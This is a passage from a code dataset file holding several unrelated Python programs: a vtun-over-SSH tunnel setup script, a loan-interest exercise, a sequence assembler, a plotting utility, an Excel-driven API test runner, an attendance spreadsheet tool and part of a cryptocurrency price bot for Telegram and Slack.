mainloop as the default loop for all subsequent code\n \n try:\n bus = dbus.SystemBus()\n proxy = bus.get_object(DBUS_NAME, DBUS_OBJECT_ROOT)\n extremity_if = proxy.GetInterface(dbus_interface=DBUS_SERVICE_INTERFACE)\n logger.debug('Read extremity network interface ' + extremity_if + ' from D-Bus call')\n # If we got a D-Bus extremity interface, carry on watching D-Bus signals for interface removal\n def dBusInterfaceRemovedHandler(ifname, **kwargs):\n logger.info('Received InterfaceRemoved D-Bus signal for interface ' + ifname)\n if ifname == extremity_if:\n event_secondary_if_down.set()\n termination_event.set()\n \n dbus_loop = gobject.MainLoop()\n \n # Allow secondary threads to run during the mainloop\n gobject.threads_init() # Allow the mainloop to run as an independent thread\n dbus.mainloop.glib.threads_init()\n \n # Run the D-Bus thread in background\n dbus_loop_thread = threading.Thread(target=dbus_loop.run)\n dbus_loop_thread.setDaemon(True)\t# dbus loop should be forced to terminate when main program exits\n dbus_loop_thread.start()\n \n proxy.connect_to_signal('InterfaceRemoved',\n dBusInterfaceRemovedHandler,\n dbus_interface=DBUS_SERVICE_INTERFACE,\n message_keyword='dbus_message') # Set a callback for the InterfaceRemoved D-Bus signal\n \n except dbus.DBusException:\n import traceback\n extremity_if = None\n traceback.print_exc() # Dump exception but continue anyway\n \n if extremity_if is None or extremity_if == '':\n extremity_if='eth0'\n \n logger.debug('Going to setup vtun tunnel in mode ' + tunnel_mode + ' with extremity interface ' + extremity_if)\n vtun_client_config = master_dev.get_client_vtun_tunnel(tunnel_mode,\n extremity_if=extremity_if,\n lan_if='eth0',\n vtun_server_hostname='127.0.0.1',\n vtun_server_port=locally_redirected_vtun_server_port,\n vtund_exec='/usr/sbin/vtund',\n vtund_use_sudo=True,\n nat_to_external=False # Never use a NAT on master devices\n ) # Returns a pythonvtunlib.client_vtun_tunnel object\n \n vtun_client = vtun_client_config.to_client_vtun_tunnel_object()\n master_dev._assert_ssh_escape_shell()\n logger.debug('Adding ssh port redirection to ssh session')\n master_dev.ssh_port_forward(locally_redirected_vtun_server_port,\n master_dev.ssh_remote_tcp_port)\n \n vtun_client.start()\n logger.debug('Started local vtun client as PID ' + str(vtun_client._vtun_pid))\n if tunnel_mode == 'L3':\n try:\n vtun_client_config.check_ping_peer()\n except:\n logger.error('Peer does not respond to pings inside the tunnel')\n session_output = vtun_client.get_output()\n session_output = '|' + session_output.replace('\\n', '\\n|') # Prefix the whole output with a | character so that dump is easily spotted\n if session_output.endswith('|'): # Remove the last line that only contains a | character\n session_output = session_output[:-1]\n while session_output.endswith('|\\n'): # Get rid of the last empty line(s) that is/are present most of the time\n session_output = session_output[:-2]\n print('Tunnel was not properly setup (no ping response from peer). Output from vtund client was:\\n' + session_output, file=sys.stderr)\n raise Exception('TunnelNotWorking')\n logger.info('Tunnel to RDV server is up (got a ping reply)')\n if args.session_time >= 0:\n print('Now sleeping ' + str(args.session_time/60) + ' min ' + str(args.session_time%60) + ' s')\n time.sleep(args.session_time)\n else:\n print('Remote session to onsite ' + remote_onsite + ' is now established')\n remote_onsite_ip_config = master_dev.get_remote_onsite_ip_config()\n if remote_onsite_ip_config:\n print('Remote onsite has it LAN interface configured with IP address ' + remote_onsite_ip_config)\n #We prepare 3 events to be set in order to have a better idea of what failed\n event_ssh_down = threading.Event()\n event_ssh_down.clear()\n event_vtun_down = threading.Event()\n event_vtun_down.clear()\n event_signal_received = threading.Event()\n event_signal_received.clear()\n \n #To set the event if we catch SIGINT, SIGTERM or SIGQUIT\n def signalHandler(signum, frame):\n logger.info('Handled signal ' + str(signum))\n event_signal_received.set()\n termination_event.set()\n \n #Thread to run to wait a process to end and then set the event\n class processWaiter(threading.Thread):\n def __init__(self, process_to_wait, event_to_set_for_logging):\n super(processWaiter,self).__init__()\n self.setDaemon(True)\n self._process = process_to_wait\n self.log_event = event_to_set_for_logging\n def run(self):\n self._process.wait()\n self.log_event.set()\n termination_event.set()\n \n #Create 2 of those thread : one for ssh and one for vtun client\n ssh_waiter = processWaiter(master_dev.get_ssh_process(), event_ssh_down)\n vtun_client_waiter = processWaiter(vtun_client.get_vtun_process(), event_vtun_down) #FIXME: Change python vtunlib in order to remove the direct access to 'private' attribute\n \n #Launch those threads\n ssh_waiter.start()\n vtun_client_waiter.start()\n \n #We connect signal to handler\n signal.signal(signal.SIGINT, signalHandler)\n signal.signal(signal.SIGTERM, signalHandler)\n signal.signal(signal.SIGQUIT, signalHandler)\n #We wait for the event in block mode and therefore the session will last 'forever' if neither ssh nor vtun client falls down \n while not termination_event.is_set():\n termination_event.wait(1) #Wait without timeout can't be interrupted by unix signal so we wait the signal with a 1 second timeout and we do that until the event is set.\n #We disconnect signal from handler\n signal.signal(signal.SIGINT, signal.SIG_DFL)\n signal.signal(signal.SIGTERM, signal.SIG_DFL)\n signal.signal(signal.SIGQUIT, signal.SIG_DFL)\n \n if event_signal_received.is_set():\n logger.info('Stopped due to UNIX signal received')\n if event_ssh_down.is_set():\n logger.error('Stopped due to a dropped SSH connection ')\n if event_vtun_down.is_set():\n logger.error('Stopped due to a dropped vtun tunnel')\n if event_secondary_if_down.is_set():\n logger.error('Stopped due to a de-configuration of secondary extremity interface')\n print('...done')\n vtun_client.stop()\n session_output = vtun_client.get_output()\n session_output = '|' + session_output.replace('\\n', '\\n|') # Prefix the whole output with a | character so that dump is easily spotted\n if session_output.endswith('|'): # Remove the last line that only contains a | character\n session_output = session_output[:-1]\n while session_output.endswith('|\\n'): # Get rid of the last empty line(s) that is/are present most of the time\n session_output = session_output[:-2]\n print('Now exitting tundev script. For debug, output from vtund client was:\\n' + session_output, file=sys.stderr)\n master_dev.exit()\n","sub_path":"masterdev_script.py","file_name":"masterdev_script.py","file_ext":"py","file_size_in_byte":17199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"133208357","text":"'''\n5.21. Calcula poupança (3)\n'''\n\ndivida = float(input(\"Dívida: \"))\ntaxa = float(input(\"Juros (Ex.: 3 para 3%): \"))\npagamento = float(input(\"Pagamento mensal: \"))\n\nmes = 1\n\nif (divida * (taxa / 100) > pagamento):\n print(\"Sua dívida não será paga nunca, pois os juros são superiores ao \\\n pagamento mensal.\")\nelse:\n saldo = divida\n jurosPago = 0\n\n while saldo > pagamento:\n juros = saldo * taxa / 100\n saldo = saldo + juros - pagamento\n jurosPago += juros\n print(f\"Saldo da dívida no mês {mes} é de R${saldo:6.2f}.\")\n mes += 1\n\n print(\n f\"Para pagar uma dívida de R${divida:8.2f}, a {taxa:5.2f} % de juros,\")\n print(\n f\"você precisará de {mes - 1} meses, pagando um total de \\\n R${jurosPago:8.2f} de juros.\")\n print(\n f\"No último mês, você teria um saldo residual de R${saldo:8.2f} \\\n a pagar.\")\n","sub_path":"pythonBook/chapter05/exercise5-21.py","file_name":"exercise5-21.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"600347897","text":"from __future__ import print_function, division\n\n''' A sequence assembler written in Python\n\n Approach:\n Incremental - reads are added one by one with no initial subsampling,\n screening or all-vs-all comparison\n Alignment - is stupid when a large number of reads will be error free and \n there is no reason to assume error free reads will be more likely to \n occur in particular regions of the genome\n Paired ends - we don't care about them. At least not unless they will help with scaffolding.\n And most people forgot they can do that and don't use large enough inserts to make it\n useful, so you might as well ignore them. Seriously.\n Refining - contigs are refined and improved as read read is added\n Fast - using kmer counting for seeding overlap detection\n\n'''\n\nfrom assembly import *\nimport glob\nimport argparse\n\nparser = argparse.ArgumentParser(description=\"Assemble NGS reads in FASTQ format into contigs\")\nparser.add_argument('files', metavar='fastq file', nargs=\"+\", help=\"name of a FASTQ read file\")\nparser.add_argument('--min_overlap', type=int, help=\"Minimum overlap required to consider reads a match\")\nparser.add_argument('--name', help=\"Name of the assembly\", default='Assembly')\n\nargs = parser.parse_args()\nif not args.min_overlap:\n args.min_overlap = 20\n\na = Assembly(args.name, args.min_overlap)\n\nfor filename in args.files:\n a.loadSeqFile(filename)\n\na.writeAssembly(a.id + \"-contigs.fasta\")\n","sub_path":"quad.py","file_name":"quad.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"236988871","text":"from glob import glob\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import linear_model\nimport torch\nfrom torchvision import datasets, transforms\nimport argparse\nimport os\n\n\ndef calculate_coeff(data, log=False, plot=False, show=False):\n data = np.array(data)\n data_clean = data[np.all(~np.isnan(data), axis=1)]\n ind_sort = np.argsort(data_clean[:,0])\n data_clean = data_clean[ind_sort]\n\n d, ll = tuple(zip(*data_clean))\n\n d = np.array(d).reshape(-1,1)\n ll = np.array(ll)\n \n if log:\n d = np.log(d)\n regr = linear_model.LinearRegression()\n regr.fit(d, ll)\n ll_pred = regr.predict(d)\n\n if plot:\n plt.plot(d, regr.predict(d), label=\"prediction\", c='r', alpha=0.5)\n plt.plot(d, ll, 'o-', alpha=0.5)\n if show:\n plt.show()\n \n return regr.coef_[0]\n\n\ndef powerset(s):\n x = len(s)\n masks = [1 << i for i in range(x)]\n for i in range(1 << x):\n yield [ss for mask, ss in zip(masks, s) if i & mask]\n\n\ndef summary(ll_path, epochs, deltas_count, deltas_total):\n assert 2 <= deltas_count <= deltas_total\n #results = list()\n #results = [list() for _ in range(9)]\n #print((('dim', ('inds',) + (('epoch', ),))))\n #results = [pd.DataFrame(columns=['epochs', 'avg_delta', 'dim']) for _ in range(deltas+1)]\n dims = list()\n #results = [[list() for _ in range(epochs)] for _ in range(deltas_count+1)]\n\n\n for epoch in list(range(1, epochs+1)):\n dims.append(list())\n fnames = sorted(glob(os.path.join(ll_path, f\"ll_*_{epoch}.txt\")))\n points = []\n for f in fnames:\n txt = pd.read_csv(f, sep=\" \", header=None)\n noise, pz, logdet, _, _ = txt.mean()\n points.append([noise, -(pz + logdet)])\n assert deltas_total == len(points)\n points = np.array(points)\n deltas = list()\n for first_delta in range(0, deltas_total-deltas_count+1):\n inds = np.arange(first_delta, first_delta+deltas_count)\n #print(points)\n #print(inds)\n avg_delta = sum(points[ind][0] for ind in inds)/len(inds)\n dim = calculate_coeff(points[inds, :], log=True, plot=False)\n dims[epoch-1].append(dim)\n deltas.append(avg_delta)\n\n return np.array(dims), np.array(deltas), np.arange(1, epochs+1)\n\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-n\", help=\"number of epochs\", required=True)\nparser.add_argument(\"-ll\", help=\"path to ll\", required=True)\nparser.add_argument(\"-d\", help=\"number of deltas\", required=True)\nparser.add_argument(\"-ds\", help=\"size of deltas subsets\", required=True)\nargs = parser.parse_args()\n\ndeltas_subset_size = 2\nll_path = args.ll\nmax_epochs = int(args.n)\ndeltas_total = int(args.d)\ndeltas_subset_size=int(args.ds)\ndims, deltas, epochs = summary(ll_path, max_epochs, deltas_subset_size, deltas_total)\n\nprint(deltas)\nprint(dims)\n#print(np.vstack((deltas, dims)))\n#plt.yticks(np.array(deltas))\n#plt.xticks(np.arange(deltas_total-deltas_subset_size))\nplt.imshow(dims)\nplt.savefig(f'plots/plot.png')\n\n#plt.imshow(results[i]['dim'].to_numpy().reshape((max_epochs, deltas-i)))\n #deltas = results[i]['avg_delta'].to_numpy()\n #plt.xticks(np.arange(deltas-i))\n #plt.yticks(np.arange(1, max_epochs+1))\n #plt.imshow(results[i]['epochs'].to_numpy().reshape((max_epochs, deltas-i)), interpolation='bilinear')\n #print(results[i]['epochs'].to_numpy())\n","sub_path":"ll_results_summary.py","file_name":"ll_results_summary.py","file_ext":"py","file_size_in_byte":3447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"302336518","text":"\n\"\"\"\n接口自动化测试\n1、excel测试用例准备好,代码可以自动读取用例数据\n2、执行接口测试,得到相应结果\n3、响应结果和预期结果作比较,看是否通过\n4、把测试是否通过的结果写入到excel工作表中\n\"\"\"\n#url=http://8.1729.91.152:8766/futureloan/member/register\n#第一步,把读取测试用例数据封装成一个函数\nimport json\n\nimport requests\nimport openpyxl\n\ndef read_case(filename,sheetname):\n wb=openpyxl.load_workbook(filename,sheetname)#加载工作簿,打开一个Excel文件\n sheet=wb[sheetname]#打开某一个表单\n row_max=sheet.max_row#获取最大行函数\n case_list=[] #新建一个空列表,存放for循环依次读取到的测试用例\n for i in range(2,row_max+1):\n data_dict=dict(\n case_id=sheet.cell(row=i,column=1).value,\n url=sheet.cell(row=i,column=5).value,\n data=sheet.cell(row=i,column=6).value,\n expect=sheet.cell(row=i,column=7).value\n )\n case_list.append(data_dict)#把每一行读取测试用例生成的字典,逐条追加到新的列表\n return case_list\n#第二部,执行接口测试\ndef api_fun(url,data):\n headers={\"X-Lemonban-Media-Type\":\"lemonban.v2\",\"Content-Type\":\"application/json\"}\n result_register=requests.post(url=url,data=data,headers=headers).json()\n return result_register\n\n#写入测试结果\ndef write_result(filename,sheetname,row,column,final_result):\n wb=openpyxl.load_workbook(filename) #加载工作簿,打开一个excel文件\n sheet=wb[sheetname]#打开某一个表单\n sheet.cell(row=row,column=column).value=final_result\n wb.save(filename)\n\ndef excute_fun(filename,sheetname):\n cases=read_case(filename, sheetname)#调用函数\n for case in cases:\n case_id=case['case_id']\n url=case['url']\n data=case['data']\n expect=eval(case['expect'])\n expect_msg=expect['msg']\n print(case_id)\n print('期望结果为{}'.format(expect_msg))\n real_result=api_fun(url=url,data=data)#调用函数\n real_msg=real_result['msg']\n print('实际结果为{}'.format(real_msg))\n if expect_msg==real_msg:\n print('这第{}条测试用例通过!'.format(case_id))\n final_result='Passed'\n else:\n print('这第{}条测试用例不通过!'.format(case_id))\n final_result='Failed'\n write_result(filename,sheetname,case_id+1,8,final_result)#调用函数\n print('*'*15)\n#\n# excute_fun('C:\\\\Users\\\\wzfwzf108122\\\\PycharmProjects\\\\python\\\\test_data\\\\test_case_api.xlsx','register')#调用函数\n","sub_path":"python_jianjian/lesson7.py","file_name":"lesson7.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"119247820","text":"#! python3\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Aug 13 14:39:40 2018\r\n\r\n@author: btrev\r\n\r\nAccepts Churchbuilder attendance spreadsheets, calculates the total attendance\r\nfor each individual over the given period and builds a new spreadsheet from\r\nthis data.\r\n\"\"\"\r\n\r\nimport pyexcel, openpyxl, os, sys, re\r\nfrom openpyxl.utils import get_column_letter\r\n\r\n\r\ndef file_input():\r\n \"\"\"User inputs spreadsheet filename and corresponding group name.\"\"\"\r\n filename = input('Please enter a spreadsheet filename e.g. attendance.ods '\r\n '(or type q to quit)\\n')\r\n if filename == 'q' or filename == 'Q':\r\n return 1\r\n if not os.path.isfile(filename):\r\n raise Exception('Error: Must be a valid filename in the current '\r\n 'working directory.') \r\n if filename[-4:] != '.ods':\r\n raise Exception('Error: File must have the extension .ods') \r\n group = input('Please enter the group name for this register. \\n')\r\n return [filename,group]\r\n \r\ndef convert_to_xlsx(file):\r\n \"\"\"Convert the given .ods file into a .xlsx with the given group name in\r\n the new filename.\"\"\"\r\n filename, group = file\r\n #remove any illegal characters from group for use in filename\r\n legalGroup = ''.join(c for c in group if c.isalnum())\r\n xlsxName = 'attendance ' + legalGroup + '.xlsx'\r\n array = pyexcel.get_array(file_name = filename)\r\n pyexcel.save_as(array = array, dest_file_name = xlsxName)\r\n return [xlsxName, group]\r\n\r\ndef check_dates(file):\r\n \"\"\"Checks that the top row of the spreadsheet contains dates only.\"\"\"\r\n filename, group = file\r\n sheet = openpyxl.load_workbook(filename).active\r\n #regex will return value if there is a date\r\n dateRegex = re.compile(r'^\\d?\\d/\\d\\d$')\r\n for column in range(2, sheet.max_column):\r\n date = sheet.cell(1,column).value\r\n datecheck = dateRegex.search(date)\r\n if datecheck == None:\r\n raise Exception('Incorrect spreadsheet format: row 1 must be'\r\n 'dates only.')\r\n return\r\n\r\ndef get_names(attendance, file):\r\n \"\"\"Builds a dictionary with all the names that appear on the spreadsheet,\r\n values are dictionaries containing group name, to store attendance later.\"\"\"\r\n filename, group = file\r\n sheet = openpyxl.load_workbook(filename).active\r\n #regexes to check column 1 contains names only\r\n nameRegex = re.compile(r'^[a-zA-z\\-]+ [a-zA-z\\-]+$')\r\n for row in range(2, sheet.max_row): #Cell A1 is empty\r\n name = sheet['A' + str(row)].value\r\n namecheck = nameRegex.search(name)\r\n if namecheck == None:\r\n raise Exception('Incorrect spreadsheet format: column 1 must ' \r\n 'be names only.')\r\n else:\r\n attendance.setdefault(name, {}) \r\n attendance[name].setdefault(group,0)\r\n return\r\n\r\ndef sum_attendance_data(attendance, file):\r\n \"\"\"Sums the 'Y's that appear on the spreadsheet to calculate total\r\n attendance and stores the data in the attendance dictionary.\"\"\"\r\n filename, group = file\r\n sheet = openpyxl.load_workbook(filename).active\r\n #check the body of the spreadsheet consists only of Y and empty cells\r\n max_column_letter = get_column_letter(sheet.max_column)\r\n finalCell = max_column_letter + str(sheet.max_row)\r\n for row in sheet['A2':finalCell]:\r\n name = row[0].value\r\n for cell in row[1:]:\r\n if cell.value != 'Y' and cell.value != None:\r\n raise Exception('Incorrect spreadsheet format: data must '\r\n \"consist of 'Y's and empty cells only.\")\r\n #count the attendance for each name\r\n if cell.value == 'Y':\r\n attendance[name][group] += 1\r\n return\r\n\r\ndef gather_attendance_data():\r\n \"\"\"Allows multiple spreadsheets to be input by the user for different \r\n groups. The attendance data for all the groups is stored in the attendance\r\n dictionary.\"\"\"\r\n attendance = {}\r\n groups = []\r\n while True:\r\n try:\r\n file = file_input()\r\n if file == 1:\r\n break\r\n groups.append(file[1]) #save group name for later\r\n xlsxFile = convert_to_xlsx(file)\r\n check_dates(xlsxFile)\r\n get_names(attendance, xlsxFile)\r\n sum_attendance_data(attendance, xlsxFile)\r\n os.remove(xlsxFile[0])\r\n except Exception as err:\r\n print(err)\r\n #delete any new .xlsx files\r\n if 'xlsxFile' in locals():\r\n if os.path.isfile(xlsxFile[0]):\r\n os.remove(xlsxFile[0])\r\n continue\r\n \r\n return [attendance, groups]\r\n\r\ndef write_totals_sheet(attendance, groups):\r\n \"\"\"Writes the total attendance data to a new spreadsheet. Column 1 is names\r\n row 1 is group names.\"\"\" \r\n if attendance == {}:\r\n return\r\n wb = openpyxl.Workbook()\r\n totalsSheet = wb.active\r\n #group names as column headers\r\n for i in range(len(groups)):\r\n totalsSheet.cell(1,i+2).value = groups[i]\r\n #enter data row by row\r\n row = 2\r\n column = 1\r\n for name, groupAtt in sorted(attendance.items()):\r\n totalsSheet.cell(row,1).value = name\r\n for group, attVal in groupAtt.items():\r\n column = groups.index(group) + 2 #find correct group column\r\n totalsSheet.cell(row,column).value = attVal\r\n row = row + 1\r\n \r\n wb.save('Total Attendance.xlsx')\r\n \r\ndef main():\r\n attendance, groups = gather_attendance_data()\r\n write_totals_sheet(attendance,groups)\r\n return 0\r\n\r\nif __name__ == '__main__':\r\n sys.exit(main())\r\n","sub_path":"totalAttendance.py","file_name":"totalAttendance.py","file_ext":"py","file_size_in_byte":5773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"313511859","text":"#!/usr/bin/env python3\n\nimport sys\nimport slack\nfrom telegram import InlineQueryResultArticle,InputTextMessageContent\nfrom telegram.ext import Updater\nfrom telegram.ext import CommandHandler, MessageHandler, Filters, InlineQueryHandler\nfrom uuid import uuid4\nimport logging\nimport exchanges\nimport requests\nimport math\nfrom datetime import datetime, timedelta\nimport re\nimport time\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s-%(message)s', level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\nBOTNAME = '@BotName_Bot'\nTOKEN = 'TELEGRAMTOKEN'\nCL_API_KEY = 'CLAPIKEY'\nSLACK_BOT_TOKEN = \"SLACKTOKEN\"\nSLACK_MENTION_REGEX = \"^<@(|[WU].+?)>(.*)\"\n\nmillnames = ['',' k',' mio',' bio',' trillion']\n\nbm = exchanges.get_exchange('bitmex')\n\ndef millify(n):\n try:\n n = float(n)\n except:\n n = 0\n millidx = max(0,min(len(millnames)-1, int(math.floor(0 if n == 0 else math.log10(abs(n))/3))))\n return '{:.1f}{}'.format(n / 10**(3 * millidx), millnames[millidx])\n\ndef startMsg(update, context):\n context.bot.send_message(chat_id=update.message.chat_id, text=\"Type /list to get a list of supported exchanges and underlyings.\\nType /price to retrieve a price.\\nFor example /price btcusd kraken\")\n\ndef bitmexMsg(update, context):\n logger.info(\"Received /bitmex command from %s\" % update.effective_user)\n if update.message.text.split().__len__()<=1:\n context.bot.send_message(chat_id=update.message.chat_id, text=\"Syntax is /bitmex . For example /bitmex XBTH18\")\n else:\n futlist = update.message.text.upper().split()[1:]\n message_text = \"\"\n for i, fut in enumerate(futlist):\n message_text+=bitmex(fut)\n if i != len(futlist)-1:\n message_text+='\\n------------\\n'\n update.message.reply_text(message_text)\n\ndef bitmex(fut):\n if len(fut) == 3:\n fut = 'XBT'+fut\n if fut[:3] == 'XBT':\n exch = ['gdax', 'bitstamp']\n spot = 'BTCUSD'\n else:\n exch = ['poloniex','bittrex']\n spot = fut[:3] + 'BTC'\n fut_stream = bm.get_stream(fut)\n if fut_stream == None:\n fut_stream = bm.init_symbol(fut)\n fut_bid = bm.get_quote(fut, 'bid')\n fut_ask = bm.get_quote(fut, 'ask')\n if fut_bid == None or fut_ask == None:\n message = \"Something went wrong, check future code \" + fut\n return message\n expiry = bm.get_instrument(fut)['expiry']\n nowdate = datetime.now()\n if expiry is None:\n expdate = nowdate\n else:\n expdate = datetime.strptime(bm.get_instrument(fut)['expiry'],'%Y-%m-%dT%H:%M:%S.%fZ')\n yearstoexp = (expdate - nowdate).total_seconds()/3600/24/365.25\n spot_bid = 0\n spot_ask = 0\n i = 0\n for en in exch:\n e = exchanges.get_exchange(en)\n if spot in e.get_supported_underlyings():\n spot_bid += e.get_quote(spot, 'bid')\n spot_ask += e.get_quote(spot, 'ask')\n i+=1\n spot_bid = float(spot_bid / i)\n spot_ask = float(spot_ask / i)\n basis_bid = fut_bid - spot_ask\n basis_ask = fut_ask - spot_bid\n spot_mid = (spot_bid + spot_ask)/2\n fut_mid = (fut_ask + fut_bid)/2\n basis_mid = (basis_ask + basis_bid)/2\n message = \"\"\n if basis_ask < 0:\n basis_premium = 100 * basis_ask / spot_mid\n elif spot_mid != 0:\n basis_premium = 100 * basis_bid / spot_mid\n else:\n basis_premium = 0\n message += \"Couldn't find supported exchange for spot price.\\n\"\n if yearstoexp == 0:\n annualized_premium = 0\n else:\n annualized_premium = 100*((1+basis_premium/100)**(1/yearstoexp)-1)\n if spot_bid > 1:\n message += \"Spot %s price is %.2f: %.2f / %.2f\" % (spot, spot_mid, spot_bid, spot_ask) + '\\n'\n message += \"Fut %s price is %.2f: %.2f / %.2f\" % (fut, fut_mid, fut_bid,fut_ask) + '\\n'\n message += \"Basis is %.2f: %.2f / %.2f. Premium of %.1f%%\" % (basis_mid, basis_bid, basis_ask, basis_premium)\n else:\n message += \"Spot %s price is %.4g: %.4g / %.4g\" % (spot, spot_mid, spot_bid, spot_ask) + '\\n'\n message += \"Fut %s price is %.4g: %.4g / %.4g\" % (fut,fut_mid, fut_bid, fut_ask) + '\\n'\n message += \"Basis is %.4g: %.4g / %.4g. Premium of %.1f%%\" % (basis_mid, basis_bid, basis_ask, basis_premium)\n if annualized_premium !=0:\n message += \" (%.1f%% annualised)\" % annualized_premium\n return message\n\ndef unknownMsg(update, context):\n logger.info(\"Received unknown command from %s: %s\" % (update.effective_user, update.message.text))\n context.bot.send_message(chat_id=update.message.chat_id, text=\"Sorry, try /start again?\")\n\ndef listExchangesMsg(update, context):\n logger.info(\"Received /list command from %s\" % update.effective_user)\n update.message.reply_text(list_text())\n\ndef list_text():\n exchange_text = 'List of supported exchanges:\\n'+'\\n'.join(sorted(exchanges.exchange_list.keys()))\n underlyings_text = 'List of available underlyings:\\n'+'\\n'.join(sorted(exchanges.get_underlyings_list()))\n end_text = 'Try /exchange to price all underlyings availablle on an exchange'\n return exchange_text + '\\n\\n' + underlyings_text + '\\n\\n' + end_text\n\ndef summaryMsg(update, context):\n logger.info(\"Received /summary command from %s\" % update.effective_user)\n logger.info(\"Command content: %s\" % update.message.text)\n if update.message.text.split().__len__() <= 1:\n ccy = ['globalsummary']\n else:\n ccy = update.message.text.split()[1:]\n update.message.reply_text('\\n'.join(summary(ccy)))\n\ndef summary(ccy_list):\n mapping = {\n 'btc' : 'bitcoin',\n 'eth' : 'ethereum',\n 'snt' : 'status',\n 'xrp' : 'ripple',\n 'xmr' : 'monero',\n 'gno' : 'gnosis-gno',\n 'gnosis' : 'gnosis-gno',\n 'pay' : 'tenx',\n 'cvc' : 'civic',\n 'dnt' : 'district0x',\n 'san' : 'santiment',\n 'omg' : 'omisego',\n 'zerox' : '0x',\n 'request' : 'request-network',\n 'req' : 'request-network',\n 'bch' : 'bitcoin-cash',\n 'cash' : 'cash-poker-pro',\n 'zec' : 'zcash',\n 'lgo' : 'legolas-exchange',\n 'legolas' : 'legolas-exchange',\n 'xlm' : 'stellar',\n 'zrx' : '0x'\n }\n results = []\n for ccy in ccy_list:\n ccy = ccy.lower()\n url = 'https://api.coinmarketcap.com/v1/ticker/%s' % ccy\n if ccy in mapping.keys():\n ccy = mapping[ccy]\n url = 'https://api.coinmarketcap.com/v1/ticker/%s' % ccy\n elif ccy == 'globalsummary':\n url = 'https://api.coinmarketcap.com/v1/global/'\n try:\n r = requests.get(url)\n r.raise_for_status()\n j = r.json()\n except requests.exceptions.RequestException as err:\n print(err)\n results.append(\"Something went wrong for currency %s\" % ccy)\n results.append('')\n continue\n if ccy == 'globalsummary':\n mkt_cap_usd = millify(j['total_market_cap_usd'])\n vol_usd = millify(j['total_24h_volume_usd'])\n btc_pct = j['bitcoin_percentage_of_market_cap']\n nb_ccy = int(j['active_currencies']) + int(j['active_assets'])\n results.append('Total crypto market cap: %s (USD)' % mkt_cap_usd)\n results.append('Last 24h volume: %s (USD)'% vol_usd)\n results.append('Bitcoin share of total market cap: %s%%' % btc_pct)\n results.append('Number of tokens in circulation: %s' % nb_ccy)\n else:\n name = j[0]['name']\n price_usd = j[0]['price_usd']\n price_btc = j[0]['price_btc']\n vol_usd = millify(j[0]['24h_volume_usd'])\n mktcap_usd = millify(j[0]['market_cap_usd'])\n rank = int(j[0]['rank'])\n pchg_1h = j[0]['percent_change_1h']\n pchg_24h = j[0]['percent_change_24h']\n pchg_7d = j[0]['percent_change_7d']\n results.append('%s: %s (USD), %s (BTC). Changes: %s%% (1h), %s%% (24h), %s%% (7d).' % (name, price_usd, price_btc, pchg_1h, pchg_24h, pchg_7d))\n if str(rank)[-1:] == '1' and str(rank)[-2:] != '11':\n suffix = 'st'\n elif str(rank)[-1:] == '2' and str(rank)[-2:] != '12':\n suffix = 'nd'\n elif str(rank)[-1:] == '3' and str(rank)[-2:] != '13':\n suffix = 'rd'\n else:\n suffix = 'th'\n results.append('%s: Volumes in past 24h: %s USD. Market cap: %s USD. %s%s market cap.' % (name, vol_usd, mktcap_usd, rank, suffix))\n results.append('')\n return results\n\ndef exchangeMsg(update, context):\n logger.info(\"Received /exchange command from %s\" % update.effective_user)\n logger.info(\"Command content: %s\" % update.message.text)\n if update.message.text.split().__len__() <= 1:\n update.message.reply_text('Syntax is \"/exchange <...>\".\\nTry \"/exchange all\" to price all underlying on all supported exchanges (can take a while).\\nType /list to see supported exchanges')\n return\n exchange_list = update.message.text.split()[1:]\n if exchange_list == ['all']:\n exchange_list = exchanges.get_exchanges_list()\n update.message.reply_text('\\n'.join(exchange(exchange_list)))\n\ndef exchange(exchange_list):\n results = []\n for en in exchange_list:\n try:\n e = exchanges.get_exchange(en.lower())\n except:\n results.append(\"Uknown exchange %s\" % en)\n continue\n results.append(\"%s:\\n\" % en)\n for ul in e.get_supported_underlyings():\n bid = e.get_quote(ul,'bid')\n ask = e.get_quote(ul,'ask')\n last = e.get_quote(ul,'last')\n if bid == 0 or ask == 0:\n spread = 1\n else:\n spread = (ask - bid) / ((ask+bid)/2)\n if last > 1:\n results.append(\"%s: Last trade %.2f. Market %.2f/ %.2f (%.1f%% wide)\" % (ul,last, bid, ask, spread * 100))\n else:\n results.append(\"%s: Last trade %.3g. Market %.3g / %.3g (%.1f%% wide)\" % (ul,last, bid, ask, spread * 100))\n results.append(\"--------------\")\n return results\n\ndef price(underlying, exchange_list):\n if underlying == 'BITCOIN':\n underlying = 'BTCUSD'\n all_requested = False\n if exchange_list == ['all']:\n all_requested = True\n exchange_list = exchanges.get_exchanges_list_for_underlying(underlying)\n if exchange_list == []:\n return ['No exchange support %s' % underlying]\n bestbid = 0.00000001\n bestask = 1000000000\n bestspread = 100\n bestbid_exch = exchange_list[0]\n bestask_exch = exchange_list[0]\n bestspread_exch = exchange_list[0]\n results = []\n i = 0\n for exchange_name in exchange_list:\n if exchange_name.lower() in exchanges.exchange_list.keys():\n exchange = exchanges.get_exchange(exchange_name.lower())\n if underlying in exchange.get_supported_underlyings():\n bid = exchange.get_quote(underlying, 'bid')\n ask = exchange.get_quote(underlying, 'ask')\n try:\n price = (bid + ask) / 2\n spread = 100 * (ask - bid) / price\n if not all_requested or spread < 3.5:\n if bid > bestbid:\n bestbid = bid\n bestbid_exch = exchange_name\n if ask < bestask:\n bestask = ask\n bestask_exch = exchange_name\n if spread < bestspread:\n bestspread = spread\n bestspread_exch = exchange_name\n i = i + 1\n if price > 1:\n results.append(\"%s %s price is %.2f: %.2f 